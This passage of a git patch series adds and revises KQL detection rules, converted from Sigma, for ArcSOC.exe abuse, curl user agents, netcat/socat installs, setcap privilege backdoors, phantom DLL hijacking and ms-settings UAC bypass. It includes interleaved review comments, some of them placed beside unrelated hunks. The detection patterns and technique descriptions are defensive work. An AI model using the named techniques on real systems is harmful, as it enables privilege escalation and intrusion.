"-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}*") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/sigma b/sigma index 0490e31e..68519438 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit 0490e31eb5b4bfc5e98ef66bbc4870176e4bed9e +Subproject commit 685194383b4d6e594ec264e7d92270108783197d From deef7ae86e038d739e5776c4ccb9d8e3bb90bf17 Mon Sep 17 00:00:00 2001 
From: Khadinxc <89855993+Khadinxc@users.noreply.github.com>
Date: Sun, 28 Dec 2025 02:45:46 +0000
Subject: [PATCH 15/17] chore: update KQL rules from latest Sigma rules
---
 .../suspicious_file_created_by_arcsoc_exe.kql | 14 ++++++++++++++
 ...eb_request_with_potential_custom_user_agent.kql | 2 +-
 .../suspicious_arcsoc_exe_child_process.kql | 13 +++++++++++++
 sigma | 2 +-
 4 files changed, 29 insertions(+), 2 deletions(-)
 create mode 100644 KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql
 create mode 100644 KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql
new file mode 100644
index 00000000..bdbf4ebf
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious File Created by ArcSOC.exe
+// Author: Micah Babinski
+// Date: 2025-11-25
+// Level: high
+// Description: Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS
+// server, creates a file with suspicious file type, indicating that it may be an executable, script file,
+// or otherwise unusual.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.persistence, attack.initial-access, attack.t1127, attack.t1105, attack.t1133
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ArcSOC.exe" and (FolderPath endswith ".ahk" or FolderPath endswith ".aspx" or FolderPath endswith ".au3" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".py" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql
index c0669df6..af558ad1 100644
--- a/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql
+++ b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql
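Review bot: The `| where` line carries no `ActionType` restriction, so on Defender XDR's DeviceFileEvents it will fire on FileModified, FileRenamed and FileDeleted rows as well as on the creations that the title and the file_event source describe; any routine rewrite or clean-up of such a file by ArcSOC.exe then alerts at the same high level as an actual drop. Prepending `ActionType in ("FileCreated", "FileRenamed")` (rename covers the write-to-temp-then-rename pattern) keeps the rule aligned with its name. If the conversion pipeline is expected to add that filter elsewhere, a `// Note:` line in the header saying so would spare the next reviewer the same question.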
@@ -7,4 +7,4 @@
 // Tags: attack.execution
 
 DeviceProcessEvents
-| where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine matches regex "\\s-H\\s" or ProcessCommandLine contains "--header") and ProcessCommandLine contains "User-Agent:"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql
new file mode 100644
index 00000000..5509bc32
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql
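Review bot: The regex `\\s-H\\s` kept on the new `| where` line still requires whitespace after `-H`, so the attached form curl accepts (`-H"User-Agent: x"` or `-HUser-Agent:x`) passes the header test only if some other `-H ` happens to be present, even though `User-Agent:` is on the line. `ProcessCommandLine matches regex @"\s-H\s*[""']?User-Agent:"` covers both spellings and ties the header switch to the User-Agent header itself rather than to any `-H` anywhere in the command. The native `-A` / `--user-agent` switch is not covered at all, which may be deliberate if another rule owns it, but a `// Note:` recording that scope decision would help.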
@@ -0,0 +1,13 @@
+// Title: Suspicious ArcSOC.exe Child Process
+// Author: Micah Babinski
+// Date: 2025-11-25
+// Level: high
+// Description: Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe.
+// ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS
+// Server system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding
+// service endpoint and remotely execute code from the ArcSOC.exe process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\ArcSOC.exe") and (not((ProcessCommandLine =~ "cmd.exe /c \"ver\"" and FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/sigma b/sigma
index 68519438..c8b1a0ff 160000
--- a/sigma
+++ b/sigma
@@ -1 +1 @@
-Subproject commit 685194383b4d6e594ec264e7d92270108783197d
+Subproject commit c8b1a0ff67b77718d7030278d8e955f621df9b6b
From 3b63287c8206631b6a9e83f21b8d7735978675bb Mon Sep 17 00:00:00 2001
From: Khadinxc <89855993+Khadinxc@users.noreply.github.com>
Date: Sun, 11 Jan 2026 02:46:50 +0000
Subject: [PATCH 16/17] chore: update KQL rules from latest Sigma rules
---
 .../process_creation/local_system_accounts_discovery_linux.kql | 2 +-
 .../process_creation/suspicious_package_installed_linux.kql | 2 +-
 sigma | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)
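Review bot: Unlike the other process-creation rules in this series (curl, devcon, KDU, reg/PowerShell), the child-process selection on the `| where` line keys on `FolderPath` alone, so an interpreter copied under another name and spawned by ArcSOC.exe is missed. Adding `or ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wmic.exe", "wscript.exe")` alongside the path list closes that gap and follows the convention the sibling rules already use. The `cmd.exe /c "ver"` exclusion is an exact `=~` match, which is fine, but a `// False Positives:` entry naming the ArcGIS component that issues it would make the exception auditable later.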
diff --git a/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
index 64673cf3..d29fa812 100644
--- a/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
+++ b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
@@ -2,7 +2,7 @@
 // Author: Alejandro Ortuno, oscd.community, CheraghiMilad
 // Date: 2020-10-08
 // Level: low
-// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
+// Description: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1087.001
 // False Positives:
diff --git a/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
index fb7f4e3a..48a6fa57 100644
--- a/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
+++ b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
@@ -9,4 +9,4 @@
 // - Legitimate administration activities
 
 DeviceProcessEvents
-| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains")
\ No newline at end of file
+| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains" or ProcessCommandLine contains "socat")
\ No newline at end of file
diff --git a/sigma b/sigma
index c8b1a0ff..6fe7343b 160000
--- a/sigma
+++ b/sigma
@@ -1 +1 @@
-Subproject commit c8b1a0ff67b77718d7030278d8e955f621df9b6b
+Subproject commit 6fe7343bf79306884b05837d5e03bcbcb141ce50
From 8ebdace3df6f6e5efe7fa94ee98bc8291411bd27 Mon Sep 17 00:00:00 2001
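Review bot: The `" nc"` term carried over on the new `| where` line is a bare substring, so `apt install ncurses-term`, `ncdu`, `ncftp` or any package whose name starts with `nc` after a space matches just like the newly added `socat`, which turns routine admin installs into alerts. `ProcessCommandLine matches regex @"\bnc\b"` keeps plain `nc`, `nc-traditional` and `nc.openbsd` while dropping those prefix hits. The `-i` test for dpkg/rpm has the same shape (it also matches `--import` and `--info`); tightening it to `ProcessCommandLine matches regex @"\s-i\w*\s"` keeps `-i`/`-ivh` and excludes the long options.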
From: Khadinxc <89855993+Khadinxc@users.noreply.github.com>
Date: Sun, 25 Jan 2026 02:48:11 +0000
Subject: [PATCH 17/17] chore: update KQL rules from latest Sigma rules
---
 .../capabilities_discovery_linux.kql | 2 +-
 ...ability_set_on_a_binary_via_setcap_utility.kql | 12 ++++++++++++
 ...ability_set_on_a_binary_via_setcap_utility.kql | 12 ++++++++++++
 .../creation_of_non_existent_system_dll.kql | 7 ++++---
 .../wmic_loading_scripting_libraries.kql | 1 +
 ...con_execution_disabling_vmware_vmci_device.kql | 15 +++++++++++++++
 .../pua_kernel_driver_utility_kdu_execution.kql | 14 ++++++++++++++
 ...dification_of_ms_settings_protocol_handler.kql | 11 +++++++++++
 ...ckage_support_framework_ai_stubs_execution.kql | 13 +++++++++++++
 ...istry_modification_for_oci_dll_redirection.kql | 13 +++++++++++++
 ...s_shell_open_command_registry_modification.kql | 14 ++++++++++++++
 sigma | 2 +-
 12 files changed, 111 insertions(+), 5 deletions(-)
 create mode 100644 KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql
 create mode 100644 KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql
 create mode 100644 KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql
 create mode 100644 KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql
 create mode 100644 KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql
 create mode 100644 KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql
 create mode 100644 KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql
 create mode 100644 KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql
diff --git a/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
index 30c6e8d6..d661373c 100644
--- a/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
+++ b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
@@ -7,4 +7,4 @@
 // Tags: attack.discovery, attack.t1083
 
 DeviceProcessEvents
-| where (ProcessCommandLine contains " -r " or ProcessCommandLine contains " /r " or ProcessCommandLine contains " –r " or ProcessCommandLine contains " —r " or ProcessCommandLine contains " ―r ") and FolderPath endswith "/getcap"
\ No newline at end of file
+| where ProcessCommandLine contains " -r " and FolderPath endswith "/getcap"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql
new file mode 100644
index 00000000..090fbbb5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql
@@ -0,0 +1,12 @@
+// Title: Linux Setgid Capability Set on a Binary via Setcap Utility
+// Author: Luc Génaux
+// Date: 2026-01-24
+// Level: low
+// Description: Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file.
+// This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).
+// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "cap_setgid" and FolderPath endswith "/setcap"
\ No newline at end of file
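Review bot: Dropping the Windows-style `/r`, `–r`, `—r` and `―r` variants is right for a Linux binary, but the remaining `" -r "` test on the new `| where` line needs whitespace on both sides, so a grouped short-option form such as `getcap -rv /` is not matched if getcap accepts grouped flags the way getopt-based tools usually do. `ProcessCommandLine matches regex @"\s-[nv]*r[nv]*(\s|$)"` keeps the current hit and adds the grouped spellings. The hunk is a single line; the rule header it belongs to lies outside it.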
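Review bot: `ProcessCommandLine contains "cap_setgid"` on the `| where` line fires on every setcap invocation that names the capability, including verification (`setcap -v cap_setgid+ep /path`) and removal (`setcap cap_setgid-ep /path`), not only the grant that the title and description promise. Anchoring on the grant operator, `ProcessCommandLine matches regex @"cap_setgid\S*[+=]"`, and excluding `ProcessCommandLine contains " -v "` limits alerts to actual grants. At Level low this is mostly noise reduction, so a `// False Positives:` entry naming the verify/remove forms would be an acceptable alternative if the broader match is intended.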
diff --git a/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql
new file mode 100644
index 00000000..e8356003
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql
@@ -0,0 +1,12 @@
+// Title: Linux Setuid Capability Set on a Binary via Setcap Utility
+// Author: Luc Génaux
+// Date: 2026-01-24
+// Level: low
+// Description: Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file.
+// This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).
+// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "cap_setuid" and FolderPath endswith "/setcap"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql
index 15ac98c8..82b26e2b 100644
--- a/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql
+++ b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql
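Review bot: As with its setgid twin, the `| where` line matches the bare substring `cap_setuid`, so `setcap -v ...` verification runs and `cap_setuid-ep` removals alert exactly like a grant, which is the opposite of the backdoor scenario the description targets. `ProcessCommandLine matches regex @"cap_setuid\S*[+=]"` together with `not(ProcessCommandLine contains " -v ")` restricts the rule to grants while still catching comma-grouped forms such as `cap_setuid,cap_setgid+ep`. Since the two rules differ only in the capability name, whichever tightening is chosen should be applied to both so they stay consistent.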
@@ -2,10 +2,11 @@
 // Author: Nasreddine Bencherchali (Nextron Systems), fornotes
 // Date: 2022-12-01
 // Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-// Usually this technique is used to achieve DLL hijacking.
+// Description: Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.
+// Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.
+// Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
 
 DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
+| where FolderPath endswith ":\\Windows\\System32\\axeonoffhelper.dll" or FolderPath endswith ":\\Windows\\System32\\cdpsgshims.dll" or FolderPath endswith ":\\Windows\\System32\\oci.dll" or FolderPath endswith ":\\Windows\\System32\\offdmpsvc.dll" or FolderPath endswith ":\\Windows\\System32\\shellchromeapi.dll" or FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith
":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file diff --git a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql index 07306e40..99e37d51 100644 --- a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql +++ b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql @@ -3,6 +3,7 @@ // Date: 2020-10-17 // Level: medium // Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). +// It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1220 // False Positives: diff --git a/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql new file mode 100644 index 00000000..d0fa7173 --- /dev/null +++ b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql 
@@ -0,0 +1,15 @@
+// Title: Devcon Execution Disabling VMware VMCI Device
+// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress)
+// Date: 2026-01-02
+// Level: high
+// Description: Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device.
+// This can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device.
+// This has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1543.003, attack.t1562.001
+// False Positives:
+// - Legitimate VMware administration, Tools installation/uninstallation, or troubleshooting driver conflicts.
+// - Automated scripts in virtualized environments for device cleanup.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " disable " and (FolderPath endswith "\\devcon.exe" or ProcessVersionInfoOriginalFileName =~ "DevCon.exe") and (ProcessCommandLine contains "15AD&DEV_0740" or ProcessCommandLine contains "VMWVMCIHOSTDEV")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql
new file mode 100644
index 00000000..c7b2e1eb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql
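Review bot: The `| where` line binds the detection to devcon.exe by path and original filename, but on recent Windows builds the in-box `pnputil.exe /disable-device` can disable the same VMCI device given its instance ID, so an attacker on a guest without devcon has an equivalent path this rule does not cover. Either a sibling rule or an extra branch such as `(FolderPath endswith "\\pnputil.exe" and ProcessCommandLine contains "/disable-device")` reusing the same `15AD&DEV_0740` / `VMWVMCIHOSTDEV` identifiers would close it. If that is out of scope by design, a `// Note:` line recording that pnputil is handled elsewhere (or not at all) would keep the coverage decision visible.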
@@ -0,0 +1,14 @@
+// Title: PUA - Kernel Driver Utility (KDU) Execution
+// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress)
+// Date: 2026-01-02
+// Level: high
+// Description: Detects execution of the Kernel Driver Utility (KDU) tool.
+// KDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel.
+// Potentially allowing for privilege escalation, persistence, or evasion of security controls.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Legitimate driver development, testing, or administrative troubleshooting (e.g., enabling/disabling hardware)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-map " or ProcessCommandLine contains "-prv " or ProcessCommandLine contains "-dse " or ProcessCommandLine contains "-ps ") and ((FolderPath endswith "\\kdu.exe" or FolderPath endswith "\\hamakaze.exe") or ProcessVersionInfoOriginalFileName =~ "hamakaze.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql
new file mode 100644
index 00000000..b4bd0d6c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql
@@ -0,0 +1,11 @@
+// Title: Registry Modification of MS-settings Protocol Handler
+// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-12-20
+// Level: medium
+// Description: Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence.
+// Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-ItemProperty" or ProcessCommandLine contains "Set-ItemProperty" or ProcessCommandLine contains "ni " or ProcessCommandLine contains "sp ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll"))))) and ProcessCommandLine contains "\\ms-settings\\shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql
new file mode 100644
index 00000000..2df2db29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql
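Review bot: The PowerShell branch on the `| where` line lists `New-ItemProperty`, `Set-ItemProperty`, `ni ` and `sp ` but not `New-Item` or `Set-Item`, so the common fodhelper-style one-liner that creates `...\ms-settings\shell\open\command` with `New-Item -Force -Value "cmd.exe"` (writing the default value without a separate property cmdlet) is not matched. Replacing the two `-ItemProperty` terms with `ProcessCommandLine contains "New-Item"` and `ProcessCommandLine contains "Set-Item"` covers both spellings, since `contains` is a substring test. Being a process-creation rule it also misses the same write issued from an obfuscated or script-file command line; a DeviceRegistryEvents rule keyed on `RegistryKey endswith "\\ms-settings\\shell\\open\\command"` would catch the modification regardless of tool, and a `// Note:` pointing at that gap would help whoever tunes this.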
@@ -0,0 +1,13 @@
+// Title: Windows MSIX Package Support Framework AI_STUBS Execution
+// Author: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-03
+// Level: low
+// Description: Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'.
+// This activity may indicate malicious MSIX packages build with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218, attack.t1553.005, attack.t1204.002
+// False Positives:
+// - Legitimate applications packaged with Advanced Installer using Package Support Framework
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AI_STUBS\\AiStubX64Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX64.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86.exe") and ProcessVersionInfoOriginalFileName =~ "popupwrapper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql
new file mode 100644
index 00000000..95e35eea
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql
@@ -0,0 +1,13 @@
+// Title: Registry Modification for OCI DLL Redirection
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2026-01-24
+// Level: high
+// Description: Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.
+// Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1112, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLib" and (not(RegistryValueData contains "oci.dll"))) or (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLibPath" and (not(RegistryValueData contains "%SystemRoot%\\System32\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql
new file mode 100644
index 00000000..ebb6ec9e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql
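Review bot: The `| where` compares `RegistryKey` against paths ending in `\MTxOCI\OracleOciLib` and `\MTxOCI\OracleOciLibPath`, but those names are registry values under the `MTxOCI` key rather than subkeys — the rule itself reads their contents through `RegistryValueData` — and in the DeviceRegistryEvents schema the value name is surfaced in `RegistryValueName`, not appended to `RegistryKey`, so as written neither clause can match and the rule never fires. The key test should stop at `\MTxOCI` and the value should be selected with `RegistryValueName =~ ...`; this looks like the Sysmon `TargetObject` (key plus value name) being mapped 1:1 onto `RegistryKey` by the converter, in which case other registry rules produced the same way are likely affected and the pipeline, not just this file, needs the fix. Narrowing `ActionType` to `RegistryValueSet` is also worth considering, because a value deletion carries an empty `RegistryValueData` and therefore satisfies both negated `contains` tests.
```kql
// … unchanged: rule header comments …
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
    and RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI"
    and ((RegistryValueName =~ "OracleOciLib" and not(RegistryValueData contains "oci.dll"))
      or (RegistryValueName =~ "OracleOciLibPath" and not(RegistryValueData contains "%SystemRoot%\\System32\\")))
```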
@@ -0,0 +1,14 @@
